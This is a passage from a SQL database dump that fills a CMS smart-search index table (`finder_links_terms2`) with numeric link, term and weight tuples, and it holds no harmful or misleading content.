(161, 189611, 1.14331),
(161, 189612, 1.07331),
(161, 189613, 1.23669),
(268, 191202, 0.86331),
(267, 191202, 1.72662),
(193, 191202, 2.58993),
(193, 191203, 0.93331),
(267, 191203, 0.93331),
(246, 192705, 0.84),
(247, 192705, 0.84),
(168, 197875, 0.91),
(168, 197876, 1.09669),
(168, 197877, 0.18669),
(265, 197877, 0.18669),
(266, 197877, 0.18669),
(267, 197877, 0.18669),
(178, 197877, 0.56007),
(168, 197878, 0.95669),
(168, 197879, 1.12),
(168, 197880, 0.37331),
(168, 197881, 0.95669),
(168, 197882, 1.09669),
(168, 197883, 0.98),
(168, 197884, 1.19),
(168, 197885, 1.19),
(168, 197886, 0.98),
(168, 197887, 1.09669),
(168, 197888, 0.93331),
(168, 197889, 1.00331),
(168, 197890, 0.84),
(274, 197890, 0.84),
(168, 197891, 0.91),
(168, 197892, 0.93331),
(168, 197893, 1.00331),
(168, 197894, 0.88669),
(168, 197895, 1.00331),
(168, 197896, 0.93331),
(168, 197897, 1.91338),
(168, 197898, 0.95669),
(168, 197899, 1.02669),
(168, 197900, 0.18669),
(168, 197901, 0.91),
(168, 197902, 1.02669),
(168, 197903, 0.95669),
(168, 197904, 0.93331),
(168, 197905, 0.86331),
(168, 197906, 0.95669),
(168, 197907, 0.93331),
(168, 197908, 0.84),
(168, 197909, 0.95669),
(168, 197910, 0.91),
(168, 197911, 1.00331),
(168, 197912, 1.02669),
(168, 197913, 1.23669),
(168, 197914, 0.93331),
(168, 197915, 0.86331),
(306, 197915, 0.86331),
(168, 197916, 1.05),
(168, 197917, 3.54676),
(168, 197918, 1.05),
(168, 197919, 1.05),
(168, 197920, 1.12),
(168, 197921, 1.00331),
(168, 197922, 0.84),
(168, 197923, 0.93331),
(168, 197924, 0.88669),
(168, 197925, 0.98),
(168, 197926, 0.86331),
(168, 197927, 0.93331),
(168, 197928, 3.54676),
(168, 197929, 1.12),
(168, 197930, 1.12),
(168, 197931, 1.07331),
(168, 197932, 1.05),
(168, 197933, 0.88669),
(168, 197934, 0.95669),
(168, 197935, 1.02669),
(168, 197936, 0.98),
(168, 197937, 1.00331),
(168, 197938, 0.91),
(168, 197939, 0.95669),
(168, 197940, 0.88669),
(305, 197940, 0.88669),
(168, 197941, 0.98),
(168, 197942, 1.05),
(168, 197943, 0.98),
(168, 197944, 1.09669),
(168, 197945, 0.42),
(168, 197946, 1.02669),
(168, 197947, 1.14331),
(168, 197948, 0.95669),
(168, 197949, 1.02669),
(168, 197950, 1.23669),
(168, 197951, 0.88669),
(168, 197952, 0.95669),
(168, 197953, 0.95669),
(168, 197954, 1.05),
(168, 197955, 1.00331),
(168, 197956, 0.95669),
(168, 197957, 1.05),
(168, 197958, 0.95669),
(168, 197959, 0.93331),
(247, 197959, 0.93331),
(168, 197960, 1.00331),
(168, 197961, 0.98),
(168, 197962, 1.07331),
(287, 197963, 0.18669),
(306, 197963, 0.18669),
(168, 197963, 0.37338),
(168, 197964, 0.86331),
(168, 197965, 1.02669),
(168, 197966, 0.98),
(168, 197967, 1.07331),
(168, 197968, 0.91),
(168, 197969, 0.98),
(168, 197970, 1.05),
(178, 197971, 0.32669),
(168, 197971, 2.10015),
(168, 197972, 0.91),
(168, 197973, 1.00331),
(168, 197974, 1.02669),
(168, 197975, 1.16669),
(168, 197976, 0.98),
(168, 197977, 1.23669),
(168, 197978, 1.00331),
(168, 197979, 1.12),
(168, 198016, 1.00331),
(168, 198017, 1.07331),
(168, 198018, 0.91),
(168, 198019, 1.00331),
(168, 198020, 0.95669),
(168, 198021, 1.02669),
(168, 198022, 0.93331),
(168, 198023, 1.05),
(168, 198024, 0.95669),
(168, 198025, 1.02669),
(168, 198026, 0.95669),
(168, 198027, 1.05),
(168, 198028, 0.95669),
(168, 198029, 1.05),
(168, 198030, 1.02669),
(168, 198031, 1.12),
(168, 198032, 0.88669),
(168, 198033, 0.98),
(168, 198034, 0.91),
(168, 198035, 0.98),
(168, 198036, 0.91),
(168, 198037, 0.98),
(178, 201064, 0.91),
(174, 201064, 1.82),
(174, 201087, 0.88669),
(178, 201087, 0.88669),
(174, 215380, 0.95669),
(174, 215381, 1.02669),
(174, 215382, 0.93331),
(174, 215383, 1.12),
(174, 215384, 1.07331),
(174, 215385, 1.00331),
(174, 215386, 0.98),
(174, 215387, 0.95669),
(174, 215388, 1.09669),
(174, 215389, 0.93331),
(174, 215390, 1.00331),
(174, 215391, 1.19),
(174, 215392, 1.12),
(174, 215393, 1.00331),
(174, 215394, 1.09669),
(174, 215395, 0.98),
(174, 215396, 0.98),
(174, 215397, 1.09669),
(174, 215398, 1.02669),
(174, 215399, 1.72662),
(174, 215400, 0.95669),
(174, 215401, 0.95669),
(174, 215402, 0.93331),
(174, 215403, 1.05),
(174, 215404, 1.72662),
(174, 215405, 1.91338),
(174, 215406, 1.00331),
(174, 215407, 1.12),
(174, 215408, 1.00331),
(174, 215409, 1.09669),
(174, 215410, 0.88669),
(174, 215411, 0.93331),
(174, 215412, 1.02669),
(174, 215413, 1.09669),
(174, 215414, 0.86331),
(174, 215415, 0.98),
(174, 215416, 1.02669),
(174, 215417, 0.88669),
(264, 215417, 0.88669),
(306, 215417, 0.88669),
(174, 215418, 1.00331),
(174, 215492, 0.37331),
(174, 215493, 0.98),
(174, 215494, 1.05),
(174, 215495, 0.95669),
(174, 215496, 1.02669),
(174, 215497, 0.86331),
(174, 215498, 1.12),
(174, 215499, 0.91),
(174, 215500, 1.02669),
(174, 215501, 0.84),
(174, 215502, 0.98),
(174, 215503, 1.16669),
(174, 215504, 1.00331),
(174, 215505, 0.98),
(174, 215506, 1.12),
(174, 215507, 0.91),
(174, 215508, 1.02669),
(174, 215509, 0.91),
(174, 215510, 1.02669),
(174, 215511, 0.86331),
(174, 215512, 0.93331),
(174, 215513, 1.05),
(174, 215514, 1.12),
(174, 215515, 1.02669),
(174, 215516, 0.88669),
(265, 215516, 0.88669),
(266, 215516, 0.88669),
(174, 215517, 1.00331),
(174, 215518, 0.32669),
(174, 215519, 0.95669),
(174, 215520, 1.05),
(174, 215521, 0.23331),
(174, 215522, 0.93331),
(174, 215523, 1.02669),
(174, 215524, 0.91),
(174, 215525, 1.19),
(174, 215526, 0.88669),
(174, 215527, 0.95669),
(174, 215528, 0.88669),
(174, 215529, 1.14331),
(174, 215530, 0.93331),
(270, 215530, 0.93331),
(301, 215530, 0.93331),
(174, 215531, 1.05),
(174, 215532, 1.05),
(174, 215533, 1.14331),
(174, 215534, 1.72662),
(174, 215535, 2.00662),
(174, 215536, 1.00331),
(174, 215537, 0.88669),
(174, 215538, 1.12),
(174, 215539, 1.05),
(174, 215540, 0.91),
(174, 215541, 1.02669),
(262, 217339, 0.86331),
(265, 217339, 0.86331),
(266, 217339, 0.86331),
(178, 221897, 0.93331),
(178, 221898, 1.02669),
(178, 221899, 0.32669),
(178, 221900, 0.93331),
(178, 221901, 0.98),
(178, 221902, 0.46669),
(178, 221903, 1.07331),
(178, 221904, 1.16669),
(178, 221905, 2.79993),
(178, 221906, 1.02669),
(178, 221907, 1.09669),
(178, 221908, 1.05),
(178, 221909, 0.98),
(178, 221910, 1.05),
(178, 221911, 0.98),
(178, 221912, 1.05),
(178, 221913, 1.02669),
(178, 221914, 1.09669),
(178, 221915, 0.93331),
(178, 221916, 1.05),
(178, 221917, 1.00331),
(178, 221918, 1.07331),
(178, 221919, 0.91),
(178, 221920, 1.02669),
(178, 221921, 0.88669),
(178, 221922, 1.02669),
(178, 221923, 0.91),
(178, 221924, 1.12),
(178, 221925, 1.14331),
(178, 221926, 1.00331),
(178, 221927, 0.86331),
(178, 221928, 1.00331),
(178, 221929, 0.93331),
(178, 221930, 1.09669),
(178, 221931, 2.73),
(178, 221932, 3.00993),
(178, 221933, 0.88669),
(178, 221934, 1.02669),
(178, 221935, 0.86331),
(265, 221935, 1.72662),
(266, 221935, 1.72662),
(178, 221936, 0.91),
(178, 221937, 0.95669),
(178, 221938, 1.00331),
(178, 221939, 0.88669),
(248, 221939, 0.88669),
(178, 221940, 0.93331),
(178, 221941, 0.98),
(178, 221942, 1.14331),
(178, 221943, 1.00331),
(178, 221944, 1.14331),
(178, 221945, 0.91),
(178, 221946, 1.00331),
(178, 221947, 0.32669),
(178, 221948, 0.95669),
(178, 221949, 1.12),
(178, 221950, 0.93331),
(178, 221951, 0.98),
(178, 221952, 0.98),
(178, 221953, 0.56),
(178, 221954, 0.98),
(178, 221955, 1.07331),
(178, 221956, 0.98),
(178, 221957, 1.07331),
(178, 221958, 1.02669),
(178, 221959, 1.07331),
(178, 221960, 1.07331),
(178, 221961, 1.19),
(178, 221962, 0.88669),
(178, 221963, 0.95669),
(178, 221964, 1.77338),
(178, 221965, 1.96),
(178, 221966, 0.91),
(178, 221967, 0.98),
(178, 221968, 0.88669),
(178, 221969, 1.00331),
(178, 221970, 0.93331),
(178, 221971, 1.00331),
(178, 221972, 0.32669),
(178, 221973, 0.95669),
(178, 221974, 1.02669),
(178, 221975, 0.28),
(178, 221976, 0.88669),
(178, 221977, 1.00331),
(178, 221978, 0.86331),
(178, 221979, 1.00331),
(178, 221980, 0.95669),
(178, 221981, 0.91),
(178, 221982, 1.12),
(178, 221983, 1.05),
(178, 221984, 1.14331),
(178, 221985, 0.91),
(178, 221986, 0.98),
(178, 221987, 0.93331),
(178, 221988, 0.98),
(178, 221989, 0.88669);
INSERT INTO `y57u5_finder_links_terms2` (`link_id`, `term_id`, `weight`) VALUES
(178, 221990, 1.00331),
(178, 221991, 0.93331),
(178, 221992, 1.02669),
(178, 221993, 0.98),
(178, 221994, 1.07331),
(178, 221995, 0.98),
(178, 221996, 0.91),
(178, 221997, 0.98),
(178, 221998, 0.95669),
(178, 221999, 1.02669),
(178, 222166, 0.91),
(178, 222167, 0.95669),
(178, 222168, 0.98),
(178, 222169, 1.05),
(178, 222170, 1.86662),
(178, 222171, 0.98),
(178, 222172, 1.00331),
(178, 222173, 0.93331),
(178, 222174, 1.02669),
(178, 222175, 1.00331),
(178, 222176, 1.09669),
(178, 222177, 0.88669),
(275, 222177, 0.88669),
(292, 222177, 0.88669),
(178, 222178, 1.05),
(292, 222179, 0.14),
(178, 222179, 0.42),
(178, 222180, 0.91),
(178, 222181, 1.02669),
(178, 222182, 0.81669),
(178, 222183, 0.88669),
(178, 222184, 0.91),
(178, 222185, 1.00331),
(178, 222186, 0.91),
(178, 222187, 1.05),
(178, 222188, 0.28),
(178, 222189, 0.91),
(178, 222190, 0.98),
(178, 222191, 0.23331),
(287, 222191, 0.46662),
(178, 222192, 0.86331),
(178, 222193, 1.00331),
(178, 222194, 0.98),
(178, 222195, 0.91),
(178, 222196, 1.05),
(178, 222197, 0.95669),
(178, 222198, 1.09669),
(178, 222199, 0.95669),
(178, 222200, 0.56),
(178, 222201, 0.93331),
(178, 222202, 1.02669),
(178, 222203, 0.88669),
(178, 222204, 0.95669),
(178, 222205, 0.09331),
(178, 222206, 0.79331),
(178, 222207, 0.88669),
(178, 222208, 0.09331),
(178, 222209, 0.81669),
(178, 222210, 0.93331),
(178, 222211, 1.02669),
(178, 222212, 0.88669),
(178, 222213, 1.02669),
(178, 222214, 0.98),
(178, 222215, 1.05),
(178, 222216, 0.56),
(178, 222217, 0.93331),
(178, 222218, 0.98),
(178, 222219, 0.88669),
(178, 222220, 0.95669),
(178, 222221, 0.98),
(178, 222222, 1.05),
(178, 222223, 1.68),
(178, 222224, 0.91),
(178, 222225, 0.91),
(264, 231957, 0.88669),
(265, 231957, 0.88669),
(266, 231957, 0.88669),
(268, 231957, 0.88669),
(265, 231962, 5.0668),
(305, 231962, 5.0668),
(264, 231962, 7.22019),
(290, 231962, 7.22019),
(265, 231963, 5.4668),
(264, 231963, 7.79019),
(248, 233506, 0.88669),
(272, 233506, 0.88669),
(280, 233506, 0.88669),
(306, 233506, 1.77338),
(248, 233515, 0.98),
(275, 233515, 0.98),
(249, 235617, 0.91),
(265, 235617, 0.91),
(266, 235617, 0.91),
(193, 238753, 0.95669),
(193, 238754, 1.05),
(193, 238755, 1.00331),
(193, 238756, 1.09669),
(193, 238757, 1.00331),
(193, 238758, 0.98),
(193, 238759, 0.93331),
(193, 238760, 0.98),
(193, 238761, 1.05),
(193, 238762, 0.93331),
(193, 238763, 1.05),
(193, 238764, 0.93331),
(193, 238765, 1.02669),
(193, 238766, 0.88669),
(193, 238767, 0.98),
(193, 238768, 0.93331),
(193, 238769, 1.05),
(193, 238770, 1.09669),
(193, 238771, 1.00331),
(275, 238771, 1.00331),
(193, 238772, 1.09669),
(193, 238773, 0.37331),
(193, 238774, 1.05),
(193, 238775, 1.21331),
(193, 238776, 0.23331),
(193, 238777, 0.91),
(193, 238778, 1.02669),
(193, 238779, 0.98),
(193, 238780, 0.88669),
(193, 238781, 1.00331),
(193, 238782, 2.38),
(193, 238783, 1.00331),
(193, 238921, 0.93331),
(193, 238922, 1.14331),
(193, 238923, 0.91),
(193, 238924, 0.98),
(193, 238925, 0.95669),
(193, 238926, 0.98),
(193, 238927, 0.46669),
(193, 238928, 1.05),
(193, 238929, 1.26),
(193, 238930, 0.18669),
(193, 238931, 0.86331),
(193, 238932, 0.98),
(193, 238933, 0.98),
(193, 238934, 1.09669),
(193, 238935, 0.98),
(193, 238936, 0.95669),
(193, 238937, 1.05),
(193, 238938, 1.09669),
(193, 238939, 1.16669),
(193, 238940, 0.91),
(193, 238941, 1.12),
(193, 238942, 2.94),
(193, 238943, 1.00331),
(270, 238943, 2.00662),
(301, 238943, 2.00662),
(193, 238944, 0.42),
(193, 238945, 0.98),
(193, 238946, 1.05),
(193, 238947, 1.07331),
(193, 238948, 1.05),
(193, 238949, 1.19),
(193, 238950, 0.98),
(193, 238951, 1.19),
(193, 238952, 0.32669),
(275, 238952, 0.32669),
(193, 238953, 0.98),
(193, 238954, 1.21331),
(193, 238955, 1.00331),
(193, 238956, 1.16669),
(193, 238957, 1.02669),
(193, 238958, 1.09669),
(193, 238959, 0.37331),
(193, 238960, 1.00331),
(193, 238961, 1.07331),
(193, 238962, 0.18669),
(193, 238963, 0.86331),
(193, 238964, 0.95669),
(193, 238965, 0.98),
(193, 238966, 0.93331),
(193, 238967, 1.05),
(193, 238968, 1.02669),
(193, 238969, 0.93331),
(193, 238970, 1.02669),
(193, 238971, 0.91),
(193, 238972, 1.00331),
(193, 238973, 0.09331),
(193, 238974, 0.93331),
(193, 238975, 1.05),
(193, 238976, 0.42),
(193, 238977, 1.16669),
(193, 238978, 1.4),
(269, 249568, 0.95669),
(272, 249568, 0.95669),
(280, 249568, 0.95669),
(270, 250508, 0.42),
(301, 250508, 0.42),
(270, 250509, 0.98),
(301, 250509, 0.98),
(270, 250510, 1.23669),
(301, 250510, 1.23669),
(270, 250511, 1.09669),
(301, 250511, 1.09669),
(270, 250512, 0.98),
(301, 250512, 0.98),
(270, 250513, 0.98),
(301, 250513, 0.98),
(270, 250514, 1.14331),
(301, 250514, 1.14331),
(270, 250515, 0.88669),
(301, 250515, 0.88669),
(270, 250516, 0.95669),
(301, 250516, 0.95669),
(270, 250517, 7.02981),
(301, 250517, 7.02981),
(270, 250518, 7.59981),
(301, 250518, 7.59981),
(270, 250519, 1.14331),
(301, 250519, 1.14331),
(265, 250520, 0.95669),
(266, 250520, 0.95669),
(270, 250520, 0.95669),
(301, 250520, 0.95669),
(270, 250521, 1.07331),
(301, 250521, 1.07331),
(270, 250522, 1.02669),
(301, 250522, 1.02669),
(270, 250523, 1.09669),
(301, 250523, 1.09669),
(270, 250524, 0.95669),
(301, 250524, 0.95669),
(270, 250525, 1.05),
(301, 250525, 1.05),
(270, 250548, 3.08007),
(301, 250548, 3.08007),
(270, 250549, 1.00331),
(301, 250549, 1.00331),
(270, 250550, 0.95669),
(301, 250550, 0.95669),
(270, 250551, 1.09669),
(301, 250551, 1.09669),
(270, 250552, 1.00331),
(301, 250552, 1.00331),
(270, 250553, 3.82676),
(301, 250553, 3.82676),
(270, 250554, 0.98),
(301, 250554, 0.98),
(270, 250555, 1.07331),
(301, 250555, 1.07331),
(270, 250556, 0.86331),
(301, 250556, 0.86331),
(270, 250557, 0.93331),
(301, 250557, 0.93331),
(270, 250558, 0.93331),
(301, 250558, 0.93331),
(270, 250559, 0.86331),
(301, 250559, 0.86331),
(270, 250560, 0.93331),
(301, 250560, 0.93331),
(270, 250561, 0.91),
(301, 250561, 0.91),
(270, 250562, 1.00331),
(301, 250562, 1.00331),
(270, 250563, 1.05),
(301, 250563, 1.05),
(270, 250564, 1.82),
(301, 250564, 1.82),
(270, 250565, 2.00662),
(301, 250565, 2.00662),
(270, 250566, 0.98),
(301, 250566, 0.98),
(270, 250567, 1.09669),
(301, 250567, 1.09669),
(270, 250568, 0.23331),
(301, 250568, 0.23331),
(270, 250569, 0.93331),
(301, 250569, 0.93331),
(270, 250570, 1.02669),
(301, 250570, 1.02669),
(265, 251110, 0.95669),
(266, 251110, 0.95669),
(265, 251111, 1.19),
(266, 251111, 1.19),
(265, 251112, 0.98),
(266, 251112, 0.98),
(265, 251113, 1.05),
(266, 251113, 1.05),
(265, 251114, 0.98),
(266, 251114, 0.98),
(265, 251115, 1.07331),
(266, 251115, 1.07331),
(265, 251116, 0.91),
(266, 251116, 0.91),
(265, 251117, 1.07331),
(266, 251117, 1.07331),
(265, 251118, 1.00331),
(266, 251118, 1.00331),
(265, 251119, 0.95669),
(266, 251119, 0.95669),
(265, 251120, 0.98),
(266, 251120, 0.98),
(265, 251121, 1.02669),
(266, 251121, 1.02669),
(265, 251122, 0.93331),
(266, 251122, 0.93331),
(265, 251123, 0.93331),
(266, 251123, 0.93331),
(265, 251124, 0.88669),
(266, 251124, 0.88669),
(274, 251124, 0.88669),
(265, 251125, 0.95669),
(266, 251125, 0.95669),
(265, 251126, 2.15339),
(266, 251126, 7.22019),
(265, 251127, 2.32339),
(266, 251127, 7.79019),
(265, 251128, 0.93331),
(266, 251128, 0.93331),
(265, 251129, 1.00331),
(266, 251129, 1.00331),
(265, 251130, 1.02669),
(266, 251130, 1.02669),
(265, 251131, 0.93331),
(266, 251131, 0.93331),
(265, 251132, 1.00331),
(266, 251132, 1.00331),
(265, 251133, 0.91),
(266, 251133, 0.91),
(265, 251134, 1.02669),
(266, 251134, 1.02669),
(265, 251135, 0.88669),
(266, 251135, 0.88669),
(265, 251136, 1.07331),
(266, 251136, 1.07331),
(265, 251137, 1.02669),
(266, 251137, 1.02669),
(265, 251138, 1.28331),
(266, 251138, 1.28331),
(265, 251139, 0.95669),
(266, 251139, 0.95669),
(265, 251140, 1.02669),
(266, 251140, 1.02669),
(265, 251181, 0.86331),
(266, 251181, 0.86331),
(265, 251182, 0.98),
(266, 251182, 0.98),
(265, 251183, 0.98),
(266, 251183, 0.98),
(265, 251184, 3.42993),
(266, 251184, 3.42993),
(265, 251185, 1.02669),
(266, 251185, 1.02669),
(265, 251186, 0.98),
(266, 251186, 0.98),
(265, 251187, 1.09669),
(266, 251187, 1.09669),
(265, 251188, 0.98),
(266, 251188, 0.98),
(265, 251189, 0.98),
(266, 251189, 0.98),
(265, 251190, 1.02669),
(266, 251190, 1.02669),
(265, 251191, 1.02669),
(266, 251191, 1.02669),
(265, 251192, 0.28),
(266, 251192, 0.28),
(265, 251193, 0.93331),
(266, 251193, 0.93331),
(265, 251194, 1.00331),
(266, 251194, 1.00331),
(265, 251195, 1.02669),
(266, 251195, 1.02669),
(265, 251196, 0.88669),
(266, 251196, 0.88669),
(265, 251197, 0.95669),
(266, 251197, 0.95669),
(265, 251198, 0.84),
(266, 251198, 0.84),
(265, 251199, 0.91),
(266, 251199, 0.91),
(272, 253289, 1.12),
(280, 253289, 1.12),
(272, 253290, 0.93331),
(280, 253290, 0.93331),
(272, 253291, 0.95669),
(280, 253291, 0.95669),
(272, 253292, 0.93331),
(280, 253292, 0.93331),
(272, 253293, 1.02669),
(280, 253293, 1.02669),
(272, 253294, 0.93331),
(280, 253294, 0.93331),
(272, 253295, 1.14331),
(280, 253295, 1.14331),
(272, 253296, 1.02669),
(280, 253296, 1.02669),
(272, 253297, 1.00331),
(280, 253297, 1.00331),
(272, 253298, 1.30669),
(280, 253298, 1.30669),
(272, 253299, 1.00331),
(280, 253299, 1.00331),
(272, 253300, 1.12),
(280, 253300, 1.12),
(272, 253301, 1.09669),
(280, 253301, 1.09669),
(272, 253302, 1.16669),
(280, 253302, 1.16669),
(272, 253303, 0.98),
(280, 253303, 0.98),
(272, 253304, 0.93331),
(280, 253304, 0.93331),
(272, 253305, 0.91),
(280, 253305, 0.91),
(272, 253308, 0.93331),
(280, 253308, 0.93331),
(272, 253309, 1.00331),
(280, 253309, 1.00331),
(272, 253310, 0.18669),
(280, 253310, 0.18669),
(272, 253311, 0.86331),
(280, 253311, 0.86331),
(272, 253312, 1.00331),
(280, 253312, 1.00331),
(272, 253313, 0.91),
(280, 253313, 0.91),
(272, 253314, 1.00331),
(280, 253314, 1.00331),
(272, 253315, 0.32669),
(280, 253315, 0.32669),
(272, 253316, 1.02669),
(280, 253316, 1.02669),
(272, 253317, 1.14331),
(280, 253317, 1.14331),
(272, 253318, 1.00331),
(280, 253318, 1.00331),
(272, 253319, 1.09669),
(280, 253319, 1.09669),
(272, 253320, 0.95669),
(280, 253320, 0.95669),
(272, 253321, 1.14331),
(280, 253321, 1.14331),
(272, 253322, 0.95669),
(280, 253322, 0.95669),
(290, 253322, 0.95669),
(272, 253323, 1.07331),
(280, 253323, 1.07331),
(290, 253323, 1.07331),
(272, 253324, 1.09669),
(280, 253324, 1.09669),
(272, 253382, 1.02669),
(280, 253382, 1.02669),
(272, 253383, 1.07331),
(280, 253383, 1.07331),
(272, 253384, 0.98),
(280, 253384, 0.98),
(272, 253385, 1.14331),
(280, 253385, 1.14331),
(272, 253386, 1.05),
(280, 253386, 1.05),
(272, 253387, 1.12),
(280, 253387, 1.12),
(272, 253388, 0.88669),
(280, 253388, 0.88669),
(272, 253389, 1.05),
(280, 253389, 1.05),
(272, 253390, 0.91),
(280, 253390, 0.91),
(272, 253391, 0.95669),
(280, 253391, 0.95669),
(272, 253392, 1.00331),
(280, 253392, 1.00331),
(272, 253393, 0.98),
(280, 253393, 0.98),
(272, 253394, 0.28),
(280, 253394, 0.28),
(272, 253395, 1.02669),
(280, 253395, 1.02669),
(272, 253396, 1.12),
(280, 253396, 1.12),
(272, 253397, 0.91),
(280, 253397, 0.91),
(272, 253398, 0.98),
(280, 253398, 0.98),
(272, 253399, 0.88669),
(280, 253399, 0.88669),
(272, 253400, 1.00331),
(280, 253400, 1.00331),
(272, 253401, 0.88669),
(280, 253401, 0.88669),
(272, 253402, 0.98),
(280, 253402, 0.98),
(273, 256233, 0.98),
(273, 256234, 0.98),
(273, 256235, 1.05),
(273, 256236, 0.28),
(273, 256237, 1.09669),
(273, 256238, 1.30669),
(273, 256239, 0.91),
(305, 256239, 0.91),
(273, 256240, 1.14331),
(273, 256241, 0.95669),
(275, 256241, 0.95669),
(306, 256241, 0.95669),
(273, 256242, 1.21331),
(273, 256243, 0.91),
(273, 256244, 1.02669),
(273, 256245, 0.86331),
(274, 256245, 0.86331),
(273, 256246, 0.93331),
(273, 256247, 0.86331),
(273, 256248, 0.95669),
(273, 256249, 7.22019),
(273, 256250, 7.79019),
(273, 256251, 0.95669),
(273, 256252, 0.88669),
(273, 256253, 0.95669),
(273, 256254, 0.81669),
(305, 256254, 0.81669),
(273, 256255, 0.93331),
(273, 256256, 0.86331),
(273, 256257, 0.95669),
(273, 256309, 0.23331),
(273, 256310, 0.91),
(273, 256311, 1.07331),
(273, 256312, 0.88669),
(273, 256313, 0.98),
(273, 256314, 1.00331),
(273, 256315, 1.02669),
(273, 256316, 0.93331),
(273, 256317, 1.09669),
(273, 256318, 0.91),
(273, 256319, 1.12),
(273, 256320, 0.14),
(273, 256321, 0.81669),
(273, 256322, 0.86331),
(288, 264747, 0.98),
(233, 266516, 0.46669),
(233, 266517, 1.00331),
(233, 266518, 1.05),
(233, 266519, 0.88669),
(233, 266520, 0.93331),
(233, 266521, 0.98),
(233, 266522, 0.84),
(306, 266522, 0.84),
(233, 266523, 1.07331),
(233, 266524, 1.12),
(233, 266525, 0.93331),
(233, 266526, 1.07331),
(233, 266527, 0.93331),
(233, 266528, 0.98),
(233, 266529, 0.93331),
(233, 266530, 1.14331),
(233, 266531, 1.00331),
(233, 266532, 1.09669),
(233, 266533, 0.91),
(233, 266534, 0.95669),
(233, 266535, 0.95669),
(233, 266536, 0.98),
(233, 266537, 0.98),
(233, 266538, 0.98),
(233, 266539, 1.02669),
(233, 266540, 1.16669),
(233, 266541, 0.98),
(233, 266542, 1.00331),
(233, 266543, 1.05),
(233, 266544, 1.12),
(233, 266545, 1.02669),
(305, 266545, 1.02669),
(233, 266546, 8.36019),
(233, 266569, 1.07331),
(233, 266570, 1.16669),
(233, 266571, 0.56),
(233, 266572, 0.93331),
(233, 266573, 1.07331),
(233, 266574, 0.91),
(233, 266575, 0.98),
(233, 266576, 1.00331),
(233, 266577, 0.91),
(233, 266578, 1.09669),
(233, 266579, 0.98),
(233, 266580, 1.09669),
(235, 267636, 1.09669),
(235, 267637, 0.88669),
(235, 267638, 1.00331),
(235, 267639, 0.95669),
(235, 267640, 1.02669),
(235, 267641, 1.00331),
(235, 267642, 1.09669),
(235, 267643, 1.96),
(235, 267644, 0.93331),
(235, 267645, 0.86331),
(235, 267646, 0.93331),
(235, 267647, 1.77338),
(235, 267648, 1.07331),
(235, 267649, 1.09669),
(235, 267650, 0.91),
(235, 267651, 1.02669),
(235, 267652, 1.02669),
(235, 267653, 1.12),
(235, 267654, 2.1),
(235, 267655, 0.95669),
(235, 267656, 1.02669),
(235, 267657, 0.98),
(235, 267658, 1.19),
(235, 267659, 0.84),
(235, 267660, 0.91),
(235, 267661, 0.84),
(235, 267662, 0.98),
(235, 267663, 0.86331),
(235, 267664, 1.05),
(235, 267665, 1.12),
(235, 267666, 0.98),
(235, 267667, 1.05),
(235, 267668, 0.46669),
(235, 267669, 1.02669),
(235, 267670, 1.19),
(235, 267671, 0.23331),
(235, 267672, 0.95669),
(235, 267673, 1.05),
(235, 267674, 0.88669),
(235, 267675, 1.14331),
(235, 267676, 0.93331),
(235, 267677, 1.09669),
(235, 267678, 0.98),
(235, 267679, 1.09669),
(235, 267680, 1.16669),
(235, 267681, 0.95669),
(235, 267682, 1.00331),
(235, 267683, 1.77338),
(235, 267684, 1.00331),
(235, 267685, 1.07331),
(235, 267686, 0.88669),
(235, 267687, 0.98),
(235, 267688, 0.86331),
(235, 267689, 0.95669),
(235, 267690, 0.86331),
(235, 267691, 0.95669),
(235, 267692, 7.89312),
(235, 267693, 5.8668),
(235, 267694, 2.60661),
(235, 267695, 1.05),
(235, 267696, 0.98),
(235, 267697, 1.05),
(235, 267698, 0.88669),
(235, 267699, 1.02669),
(235, 267700, 0.51331),
(235, 267701, 1.07331),
(235, 267702, 1.16669),
(235, 267703, 0.74662),
(235, 267704, 0.93331),
(235, 267705, 1.02669),
(235, 267706, 1.00331),
(235, 267707, 1.09669),
(235, 267708, 0.23331),
(235, 267709, 0.88669),
(235, 267710, 0.98),
(235, 267711, 0.28),
(235, 267712, 0.91),
(235, 267713, 1.16669),
(235, 267714, 0.56),
(235, 267715, 1.86662),
(235, 267716, 1.02669),
(235, 267717, 1.02669),
(235, 267718, 0.42),
(235, 267719, 1.00331),
(235, 267720, 1.12),
(235, 267790, 1.02669),
(235, 267791, 0.98),
(235, 267792, 1.09669),
(235, 267793, 1.02669),
(235, 267794, 1.14331),
(235, 267795, 0.86331),
(235, 267796, 1.07331),
(235, 267797, 0.91),
(235, 267798, 1.07331),
(235, 267799, 1.00331),
(235, 267800, 1.12),
(235, 267801, 0.91),
(235, 267802, 1.00331),
(235, 267803, 0.91),
(235, 267804, 1.86662),
(235, 267805, 1.00331),
(235, 267806, 1.05),
(235, 267807, 1.00331),
(235, 267808, 0.95669),
(235, 267809, 1.07331),
(235, 267810, 0.95669),
(235, 267811, 1.09669),
(235, 267812, 1.12),
(235, 267813, 1.02669),
(235, 267814, 0.86331),
(235, 267815, 1.02669),
(235, 267816, 0.86331),
(235, 267817, 0.93331),
(236, 268817, 0.23331),
(236, 268818, 0.91),
(236, 268819, 1.05),
(236, 268820, 0.28),
(236, 268821, 0.91),
(236, 268822, 1.02669),
(236, 268823, 1.12),
(236, 268824, 1.05),
(236, 268825, 1.00331),
(236, 268826, 0.91),
(236, 268827, 1.05),
(236, 268828, 1.12),
(236, 268829, 1.12),
(236, 268830, 1.21331),
(236, 268831, 0.91),
(236, 268832, 1.05),
(236, 268833, 1.00331),
(236, 268834, 0.98),
(236, 268835, 0.91),
(236, 268836, 0.98),
(236, 268837, 0.28),
(236, 268838, 0.88669),
(236, 268839, 1.12),
(236, 268840, 0.93331),
(236, 268841, 1.07331),
(236, 268842, 0.93331),
(236, 268843, 1.00331),
(236, 268844, 0.98),
(236, 268845, 1.16669),
(236, 268846, 0.93331),
(236, 268847, 1.05),
(236, 268848, 0.81669),
(236, 268849, 0.91),
(236, 268850, 1.05),
(236, 268851, 1.19),
(236, 268852, 0.42),
(236, 268853, 1.07331),
(236, 268854, 1.12),
(236, 268915, 1.12),
(236, 268916, 0.91),
(236, 268917, 0.95669),
(236, 268918, 0.93331),
(236, 268919, 1.07331),
(236, 268920, 0.86331),
(236, 268921, 1.00331),
(236, 268922, 0.88669),
(236, 268923, 0.93331),
(236, 268924, 0.95669),
(236, 268925, 0.88669),
(236, 268926, 1.00331),
(236, 268927, 0.88669),
(236, 268928, 0.93331),
(237, 269619, 0.93331),
(237, 269620, 1.02669),
(237, 269621, 1.05),
(237, 269622, 1.05),
(237, 269623, 1.02669),
(237, 269624, 0.95669),
